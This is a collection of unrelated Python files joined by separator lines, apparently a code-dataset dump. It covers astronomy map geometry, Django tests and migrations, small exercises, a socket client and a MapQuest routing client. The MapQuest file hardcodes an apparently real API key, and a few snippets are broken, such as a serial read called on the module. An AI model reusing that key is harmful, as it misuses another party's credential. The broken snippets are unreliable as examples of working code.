import numpy as np
import hpgeom as hpg
from .healSparseMap import HealSparseMap
from .utils import is_integer_value
import numbers
def realize_geom(geom, smap, type='or'):
"""
Realize geometry objects in a map.
Parameters
----------
geom : Geometric primitive or list thereof
List of Geom objects, e.g. Circle, Polygon
smap : `HealSparseMap`
The map in which to realize the objects.
type : `str`
Way to combine the list of geometric objects. Default
is to "or" them.
"""
if type != 'or':
raise ValueError('type of composition must be or')
if not smap.is_integer_map:
raise ValueError('can only or geometry objects into an integer map')
if not isinstance(geom, (list, tuple)):
geom = [geom]
# split the geom objects up by value
gdict = {}
for g in geom:
value = g.value
if isinstance(value, (tuple, list, np.ndarray)):
value = tuple(value)
# This is a wide mask
if not smap.is_wide_mask_map:
raise ValueError("Can only use wide bit geometry values in a wide mask map")
for v in value:
_check_int(v)
else:
_check_int(value)
_check_int_size(value, smap.dtype)
if value not in gdict:
gdict[value] = [g]
else:
gdict[value].append(g)
# deal with each value separately and add to
# the map
for value, glist in gdict.items():
for i, g in enumerate(glist):
tpixels = g.get_pixels(nside=smap.nside_sparse)
if i == 0:
pixels = tpixels
else:
oldsize = pixels.size
newsize = oldsize + tpixels.size
# need refcheck=False because it will fail when running
# the python profiler; I infer that the profiler holds
# a reference to the objects
pixels.resize(newsize, refcheck=False)
pixels[oldsize:] = tpixels
pixels = np.unique(pixels)
if smap.is_wide_mask_map:
smap.set_bits_pix(pixels, value)
else:
values = smap.get_values_pix(pixels)
values |= value
smap.update_values_pix(pixels, values)
def _check_int(x):
check = isinstance(x, numbers.Integral)
if not check:
raise ValueError('value must be integer type, '
'got %s' % x)
def _check_int_size(value, dtype):
ii = np.iinfo(dtype)
if value < ii.min or value > ii.max:
raise ValueError('value %d outside range [%d, %d]' %
(value, ii.min, ii.max))
class GeomBase(object):
"""
Base class for goemetric objects that can convert
themselves to maps.
"""
@property
def is_integer_value(self):
"""
Check if the value is an integer type
"""
return is_integer_value(self._value)
@property
def value(self):
"""
Get the value to be used for all pixels in the map.
"""
return self._value
def get_pixels(self, *, nside):
"""
Get pixels for this geometric shape.
Parameters
----------
nside : `int`
HEALPix nside for the pixels.
"""
raise NotImplementedError('Implement get_pixels')
def get_map(self, *, nside_coverage, nside_sparse, dtype, wide_mask_maxbits=None):
"""
Get a healsparse map corresponding to this geometric primitive.
Parameters
----------
nside_coverage : `int`
nside of coverage map
nside_sparse : `int`
nside of sparse map
dtype : `np.dtype`
dtype of the output array
wide_mask_maxbits : `int`, optional
Create a "wide bit mask" map, with this many bits.
Returns
-------
hsmap : `healsparse.HealSparseMap`
"""
x = np.zeros(1, dtype=dtype)
if is_integer_value(x[0]):
sentinel = 0
else:
sentinel = hpg.UNSEEN
if isinstance(self._value, (tuple, list, np.ndarray)):
# This is a wide mask
if wide_mask_maxbits is None:
wide_mask_maxbits = np.max(self._value)
else:
if wide_mask_maxbits < np.max(self._value):
raise ValueError("wide_mask_maxbits (%d) is less than maximum bit value (%d)" %
(wide_mask_maxbits, np.max(self._value)))
smap = HealSparseMap.make_empty(
nside_coverage=nside_coverage,
nside_sparse=nside_sparse,
dtype=dtype,
sentinel=sentinel,
wide_mask_maxbits=wide_mask_maxbits
)
pixels = self.get_pixels(nside=nside_sparse)
if wide_mask_maxbits is None:
# This is a regular set
smap.update_values_pix(pixels, np.array([self._value], dtype=dtype))
else:
# This is a wide mask
smap.set_bits_pix(pixels, self._value)
return smap
def get_map_like(self, sparseMap):
"""
Get a healsparse map corresponding to this geometric primitive,
with the same parameters as an input sparseMap.
Parameters
----------
sparseMap : `healsparse.HealSparseMap`
Input map to match parameters
Returns
-------
hsmap : `healsparse.HealSparseMap`
"""
if not isinstance(sparseMap, HealSparseMap):
raise RuntimeError("Input sparseMap must be a HealSparseMap")
if sparseMap.is_rec_array:
raise RuntimeError("Input SparseMap cannot be a rec array")
if sparseMap.is_wide_mask_map:
wide_mask_maxbits = sparseMap.wide_mask_maxbits
else:
wide_mask_maxbits = None
return self.get_map(nside_coverage=sparseMap.nside_coverage,
nside_sparse=sparseMap.nside_sparse,
dtype=sparseMap.dtype, wide_mask_maxbits=wide_mask_maxbits)
class Circle(GeomBase):
"""
Parameters
----------
ra : `float`
RA in degrees (scalar-only).
dec : `float`
Declination in degrees (scalar-only).
radius : `float`
Radius in degrees (scalar-only).
value : number
Value for pixels in the map (scalar or list of bits for `wide_mask`)
"""
def __init__(self, *, ra, dec, radius, value):
self._ra = ra
self._dec = dec
self._radius = radius
self._value = value
sc_ra = np.isscalar(self._ra)
sc_dec = np.isscalar(self._dec)
sc_radius = np.isscalar(self._radius)
if (not sc_ra) or (not sc_dec) or (not sc_radius):
raise ValueError('Circle only accepts scalar inputs for ra, dec, and radius')
@property
def ra(self):
"""
Get the RA value.
"""
return self._ra
@property
def dec(self):
"""
Get the dec value.
"""
return self._dec
@property
def radius(self):
"""
Get the radius value.
"""
return self._radius
def get_pixels(self, *, nside):
return hpg.query_circle(
nside,
self._ra,
self._dec,
self._radius,
nest=True,
inclusive=False,
)
def __repr__(self):
s = 'Circle(ra=%.16g, dec=%.16g, radius=%.16g, value=%s)'
return s % (self._ra, self._dec, self._radius, repr(self._value))
class Polygon(GeomBase):
"""
Represent a polygon.
Both counter clockwise and clockwise order for polygon vertices works
Parameters
----------
ra : `np.ndarray` (nvert,)
RA of vertices in degrees.
dec : `np.ndarray` (nvert,)
Declination of vertices in degrees.
value : number
Value for pixels in the map
"""
def __init__(self, *, ra, dec, value):
ra = np.array(ra, ndmin=1)
dec = np.array(dec, ndmin=1)
if ra.size != dec.size:
raise ValueError('ra/dec are different sizes')
if ra.size < 3:
raise ValueError('A polygon must have at least 3 vertices')
self._ra = ra
self._dec = dec
self._vertices = hpg.angle_to_vector(ra, dec, lonlat=True)
self._value = value
self._is_integer = is_integer_value(value)
@property
def ra(self):
"""
Get the RA values of the vertices.
"""
return self._ra
@property
def dec(self):
"""
Get the dec values of the vertices.
"""
return self._dec
@property
def vertices(self):
"""
Get the vertices in unit vector form.
"""
return self._vertices
def get_pixels(self, *, nside):
pixels = hpg.query_polygon(
nside,
self._ra,
self._dec,
nest=True,
inclusive=False,
)
return pixels
def __repr__(self):
ras = repr(self._ra)
decs = repr(self._dec)
s = 'Polygon(ra=%s, dec=%s, value=%s)'
return s % (ras, decs, repr(self._value))
class Ellipse(GeomBase):
"""
Create an ellipse.
Parameters
----------
ra : `float`
ra in degrees (scalar only)
dec : `float`
dec in degrees (scalar only)
semi_major : `float`
The semi-major axis of the ellipse in degrees.
semi_minor : `float`
The semi-minor axis of the ellipse in degrees.
alpha : `float`
Inclination angle, counterclockwise with respect to North (degrees).
value : number
Value for pixels in the map (scalar or list of bits for `wide_mask`).
"""
def __init__(self, *, ra, dec, semi_major, semi_minor, alpha, value):
self._ra = ra
self._dec = dec
self._semi_major = semi_major
self._semi_minor = semi_minor
self._alpha = alpha
self._value = value
sc_ra = np.isscalar(self._ra)
sc_dec = np.isscalar(self._dec)
sc_semi_major = np.isscalar(self._semi_major)
sc_semi_minor = np.isscalar(self._semi_minor)
sc_alpha = np.isscalar(self._alpha)
if not sc_ra or not sc_dec or not sc_semi_major or not sc_semi_minor or not sc_alpha:
raise ValueError(
'Ellipse only accepts scalar inputs for ra, dec, semi_major, semi_minor, and alpha.'
)
@property
def ra(self):
"""
Get the RA value.
"""
return self._ra
@property
def dec(self):
"""
Get the dec value.
"""
return self._dec
@property
def semi_major(self):
"""
Get the semi_major value.
"""
return self._semi_major
@property
def semi_minor(self):
"""
Get the semi_minor value.
"""
return self._semi_minor
@property
def alpha(self):
"""
Get the alpha value.
"""
return self._alpha
def get_pixels(self, *, nside):
return hpg.query_ellipse(
nside,
self._ra,
self._dec,
self._semi_major,
self._semi_minor,
self._alpha,
nest=True,
inclusive=False
)
def __repr__(self):
s = 'Ellipse(ra=%.16g, dec=%16g, semi_major=%16g, semi_minor=%16g, alpha=%16g, value=%s)'
return s % (self._ra, self._dec, self._semi_major, self._semi_minor, self._alpha, repr(self._value))
|
# Copyright 2021 DAI Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
@dataclass
class NodeConnection:
chain: str
url: str
poa: bool
def __repr__(self) -> str:
return f"<Chain: {self.chain}, Node: {self.url}, Poa: {self.poa}>"
def __iter__(self):
return iter(self.__dict__.items())
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-08 15:34
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("elections", "0052_auto_20181005_1645")]
operations = [
migrations.AlterField(
model_name="election",
name="group",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="_children_qs",
to="elections.Election",
),
)
]
|
'''
Given two strings s1 and s2, write a function to return true if s2 contains the permutation of s1. In other words, one of the first string's permutations is the substring of the second string.
Example 1:
Input:s1 = "ab" s2 = "eidbaooo"
Output:True
Explanation: s2 contains one permutation of s1 ("ba").
Example 2:
Input:s1= "ab" s2 = "eidboaoo"
Output: False
Note:
The input strings only contain lower case letters.
The length of both given strings is in range [1, 10,000].
'''
class Solution:
def checkInclusion(self, s1, s2):
if not s1:
return True
if len(s2)<len(s1):
return False
s1_counter=collections.Counter(s1)
s2_counter=collections.Counter(s2[:len(s1)])
if s1_counter==s2_counter:
return True
for i in range(1,len(s2)-len(s1)+1):
s2_counter.update(s2[i+len(s1)-1])
s2_counter-=collections.Counter(s2[i-1])
if s1_counter==s2_counter:
return True
return False
"""
:type s1: str
:type s2: str
:rtype: bool
"""
|
import window.player
import svecova.player
#import svecova.player03
import sebastian.player
import martins.player
import lionel.player
import janmrzilek.player
import benda.player
import vrba.player
from gomoku_tournament import GomokuTournament
playerX = svecova.player.Player(1)
playerO = benda.player.Player(-1)
tournament = GomokuTournament(playerX, playerO, 300)
winner = tournament.game()
tournament.save_logs()
print(f'winner is {winner}')
|
import serial
ser = serial.Serial('COM1', baudrate=9600, bytesize=8, parity='N', stopbits=1)
ser.write(b'G1 X5 Y50 \r\n')
resp = serial.readline()
|
items = ('st','BD','BTL','CG','DD','HBT')
a = ('thứ tự các quận trong thành phố:')
print(a,*items,sep=',')
number = ('150,300','247,100','333,300','266,800','420,900','318,000')
b = ('số dân theo thứ tự các quận:')
print(b,*number,sep=';')
smallest = ('st')
c = ('quận có số dân ít nhất:')
print(*c,*smallest,sep='')
print('150,300')
biggest = ('DD')
c = ('quận có số dân nhiều nhất:')
print(*c,*biggest,sep='')
print('420,900')
|
def myGenFunc():
v = 2
yield v
v = 3
yield v
v = 4
yield v
gen_obj= myGenFunc()
print(next(gen_obj))
print(next(gen_obj))
print(next(gen_obj))
|
#! usr/bin/env python
# -*-coding:utf-8-*-
# author:yanwenming
# date:2020-06-30
import unittest
from page.init import *
import requests
import time as t
import os
import sys
from bs4 import BeautifulSoup
from lxml import etree
curPath = os.path.abspath ( os.path.dirname ( __file__ ) )
rootPath = os.path.split( curPath )[0]
sys.path.append ( rootPath )
# print ( sys.path )
url = 'http://ptj-test.uyess.com/'
r = requests.get(url)
# print(r.text)
with open('index.html', mode='w', encoding='gbk') as f:
f.write(r.text)
def parse_data():
with open('index.html', mode='r', encoding='gbk') as f:
html = f.read()
# 创建BeautifulSoup实例,解析html数据
# 指定使用html解析器parser
bs = BeautifulSoup(html, 'html.parser')
#查找数据
# 1.find()方法,获取第一个匹配的标签
# div = bs.find('div')
# print(div)
# print(type(div)) # Tag类型
# 2.find_all()方法,获取所有匹配的标签
metas = bs.find_all('meta') # 返回的是集合
print(metas)
# print(bs.find_all(id='hello')) # 根据id获取,返回的是集合
# print(bs.find_all(class_='itany')) # 根据class获取
# 3.select()方法,使用CSS选择器来获取元素
# print(bs.select('#hello'))
# print(bs.select('.itany'))
# print(bs.select('p#world span'))
# print(bs.select('[title]'))
# 4.get_text()方法,获取Tag中的文本
# value = bs.select('#hello')[0].get_text()
# # print(len(value))
# print(value)
# client = requests.session()
# client.get(url)
# if '_csrf' in client.cookies:
# csrftoken = client.cookies['_csrf']
# else:
# csrftoken = client.cookies['_csrf']
# print (csrftoken)
|
import sys,os
from socket import *
if(len(sys.argv)>2):
host=sys.argv[1]
port=int(sys.argv[2])
else:
print("Required Parameters not found. You should provide host and port to create socket connection")
sys.exit(1)
server_address=gethostbyname(host)
connection_socket=socket(AF_INET,SOCK_STREAM)
connection_socket.connect((server_address,port))
incoming_stream = connection_socket.makefile("r")
outgoing_stream = connection_socket.makefile("w")
print(incoming_stream.read())
incoming_stream.close()
outgoing_stream.close()
connection_socket.close()
|
#!/usr/bin/env python
# coding: utf-8
# # Assignment 3
# In[ ]:
# 1. Why are functions advantageous to have in your programs?
# solu:
# The major advantage of functions is repeatability of them we can reuse them any number of times in the program which ultimately helps in avoiding the writing of code to perform the same operation/functionality .
# 2. When does the code in a function run: when it's specified or when it's called?
# solu:
# The code in the function run only when it is called .
# 3. What statement creates a function?
# solu:
# defining the function takes place when we make use of the "def" statement followed by function name and parameters in between the ()parenthesis .It should pass the same number of parameters when it is calling the function has it has defined in its parameters while initialising. Like example below ,
#
# def funcName(a,b):
#
# #statement
#
# funcName(a,b)
# 4. What is the difference between a function and a function call?
# solu:
# function is a separate part of the program which has a particular task need to be completed when it is called . Function call is something which calls the function to come and complete the task/work being assigned to it whenever and where-ever required after being called by the function call .
# 5. How many global scopes are there in a Python program? How many local scopes?
# solu:
# Basically there are two types : Global scopes and Local scope.
# Global scope : It is declared at the beginning/outside of the function/constructor/method because of which it can be accessed from any where in the program.It allocates the memory for them at the beginning of the program itself.
#
# Local scope : It is declared inside the method /function/constructor becaus of which it can be accessed inside only the particular method in which it was declared .It allocates the memory only when the function/constructor/method is called or in use.
#
# if both the variables in global and local have same name then first it will check for local variable if not present them it will take the global variable only when it has same name as of local variable.
#
#
# 6. What happens to variables in a local scope when the function call returns?
# solu:
# when the function call returns then the local scope destroy the memory after the execution .
# 7. What is the concept of a return value? Is it possible to have a return value in an expression?
# solu:
# Return value is mostly used in functions/methods.
# The concept of return value is to send the result of a function / method back to the callers statement of the function/method.
# If the defined function has explicit return statement then Yes we can have a return value in expression.
#
# 8. If a function does not have a return statement, what is the return value of a call to that function?
# solu:
# In such case of function does not have a return statement it will simply return a NONE value .
# 9. How do you make a function variable refer to the global variable?
# solu:
# By using the Global keyword we can make a function variable refer to a global variable but the names of both the variables should be same.
# 10. What is the data type of None?
# solu:
# The data type of None is unique ,it's data type is also "NoneType".
# 11. What does the sentence import areallyourpetsnamederic do?
# solu:
# It imports the module naming areallyourpetsnamederic if it exists.
# 12. If you had a bacon() feature in a spam module, what would you call it after importing spam
# solu:
# step-1: Import spam
# step-2: spam.bacon()
# 13. What can you do to save a programme from crashing if it encounters an error?
# Solu:
# By handling the expected errors by implementing try and catch method to handle the exceptions.
# 14. What is the purpose of the try clause? What is the purpose of the except clause?
# solu:
# The idea of the try-except clause is to handle runtime exceptions . try clause:consists of code which might trigger exceptions . exception clause is used, it goes into the except block to let the programmer know about the exception occured and handle it further.
|
from turtle import *
screen = Screen()
screen.bgcolor("green")
bob = Turtle()
bob.color("yellow")
bob.pensize(2)
bob.speed(0)
bob.shape("turtle")
for x in range(10):
bob.forward(15)
bob.left(10)
bob.backward(15)
bob.left(10)
mainloop()
|
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from app.models import City, Location, State
from app.serializers import CitySerializer, LocationSerializer, StateSerializer
class CityApiTestCase(APITestCase):
@classmethod
def setUpTestData(cls):
cls.city_1 = City.objects.create(name='Москва')
cls.city_2 = City.objects.create(name='Санкт-Петербург')
def test_get(self):
url = reverse('city-detail', kwargs={'pk': self.city_1.id})
serialized_data = CitySerializer(self.city_1).data
response = self.client.get(url)
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(serialized_data, response.data)
def test_get_nonexistent(self):
id = 3
url = reverse('city-detail', kwargs={'pk': id})
response = self.client.get(url)
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
def test_get_list(self):
url = reverse('city-list')
serialized_data = CitySerializer([self.city_1, self.city_2], many=True).data
response = self.client.get(url)
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(serialized_data, response.data)
class LocationApiTestCase(APITestCase):
@classmethod
def setUpTestData(cls):
city = City.objects.create(name='Москва')
cls.location_1 = Location.objects.create(city=city, street='ул. Тверская', support=1)
cls.location_2 = Location.objects.create(city=city, street='ул. Тверская', support=2)
def test_get(self):
url = reverse('location-detail', kwargs={'pk': self.location_1.id})
serialized_data = LocationSerializer(self.location_1).data
response = self.client.get(url)
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(serialized_data, response.data)
def test_get_nonexistent(self):
id = 3
url = reverse('location-detail', kwargs={'pk': id})
response = self.client.get(url)
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
def test_get_list(self):
url = reverse('location-list')
serialized_data = LocationSerializer([self.location_1, self.location_2], many=True).data
response = self.client.get(url)
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(serialized_data, response.data)
class StateApiTestCase(APITestCase):
@classmethod
def setUpTestData(cls):
cls.state_1 = State.objects.create(state=0, logs='Test logs')
cls.state_2 = State.objects.create(state=1, logs='Test logs')
def test_get(self):
url = reverse('state-detail', kwargs={'pk': self.state_1.id})
serialized_data = StateSerializer(self.state_1).data
response = self.client.get(url)
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(serialized_data, response.data)
def test_get_nonexistent(self):
id = 3
url = reverse('state-detail', kwargs={'pk': id})
response = self.client.get(url)
self.assertEqual(status.HTTP_404_NOT_FOUND, response.status_code)
def test_get_list(self):
url = reverse('state-list')
serialized_data = StateSerializer([self.state_1, self.state_2], many=True).data
response = self.client.get(url)
self.assertEqual(status.HTTP_200_OK, response.status_code)
self.assertEqual(serialized_data, response.data)
|
from django.conf import settings
from django.contrib.auth.models import User
from todo.models import List
STAFF_ONLY = getattr(settings, 'TODO_STAFF_ONLY', False)
first_superuser = User.objects.filter(is_superuser=True)[0]
DEFAULT_ASSIGNEE = getattr(settings, 'TODO_DEFAULT_ASSIGNEE', first_superuser.username)
first_list = List.objects.first()
DEFAULT_LIST_ID = getattr(settings, 'TODO_DEFAULT_LIST_ID', first_list.id)
PUBLIC_SUBMIT_REDIRECT = getattr(settings, 'TODO_PUBLIC_SUBMIT_REDIRECT', '/')
|
import json
import urllib.parse
import urllib.request
import socket
MAPQUEST_API_KEY = 'n1VVYuFNFcNEGPdRBheFtlUjEPLiQmsn'
BASE_URL = 'http://open.mapquestapi.com/directions/v2/'
BASE_URL2 = 'http://open.mapquestapi.com/elevation/v1/'
def build_search_url(src: str, dest: [str]) -> str:
query_parameters = [
('key', MAPQUEST_API_KEY), ('from', src)]
for i in dest:
query_parameters.append(('to', i))
return BASE_URL + '/route?' + urllib.parse.urlencode(query_parameters)
def get_result(url: str) -> dict:
response = None
try:
response = urllib.request.urlopen(url)
json_text = response.read().decode(encoding = 'utf-8')
return json.loads(json_text)
finally:
if response != None:
response.close()
def build_elevation_url(result: dict) -> str:
query_parameters = [('key', MAPQUEST_API_KEY)]
to_add = ""
"""
sub_result = result['route']['locations']
for i in range(len(sub_result)):
lat = sub_result[i]['latLng']['lat']
lng = sub_result[i]['latLng']['lng']
to_add += str(lat) + "," + str(lng) + ","
query_parameters.append(('latLngCollection', to_add.rstrip(",")))
print("HERE", query_parameters)
"""
query_parameters.append(('sessionId', result['route']['sessionId']))
print("HERE", query_parameters)
return BASE_URL2 + '/profile?' + urllib.parse.urlencode(query_parameters)
def refine(result: dict, result2: dict) -> dict:
to_return = {'Steps':[], 'TotalDistance':int, 'TotalTime':int,
'LatLong':[], 'Elevation':[]}
step_guide = result['route']['legs']
for i in range(len(step_guide)):
for j in range(len(step_guide[i]['maneuvers'])):
to_return['Steps'].append(step_guide[i]['maneuvers'][j]['narrative'])
to_return['TotalDistance'] = int(result['route']['distance'])
to_return['TotalTime'] = int(result['route']['time'])
sub_result = result['route']['locations']
for i in range(len(sub_result)):
lat = sub_result[i]['latLng']['lat']
lng = sub_result[i]['latLng']['lng']
to_return['LatLong'].append((lat,lng))
for i in range(len(result2['elevationProfile'])):
to_return['Elevation'].append(result2['elevationProfile'][i]['height'])
return to_return
|
# -*- coding: utf-8 -*-
"""
Created on Fri May 25 18:53:12 2018
@author: Consiousflow
"""
import numpy as np
import os
import math
from sklearn import mixture
import matplotlib.pyplot as plt
from pylab import *
from scipy import stats
path_av = "D:/Downloads/Cache/Desktop/Temp/embedding/AV/"
path_bv = "D:/Downloads/Cache/Desktop/Temp/embedding/BV/"
names_av = os.listdir(path_av)
names_bv = os.listdir(path_bv)
i = 1
obs = np.zeros((0,262144))
for name in names_av:
av = np.load(path_av+name).reshape((1,262144))
obs = np.append(obs,av,axis=0)
print(obs.shape)
i = i+1
for name in names_bv:
bv = np.load(path_bv+name).reshape((1,262144))
obs = np.append(obs,bv,axis=0)
print(obs.shape)
i = i+1
clf = mixture.GMM(n_components=3)
clf.fit(obs)
p = clf.score(obs)
print(p)
#for i in range(len(p)):
# p[i] = math.pow(2,p[i])
#print(p)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.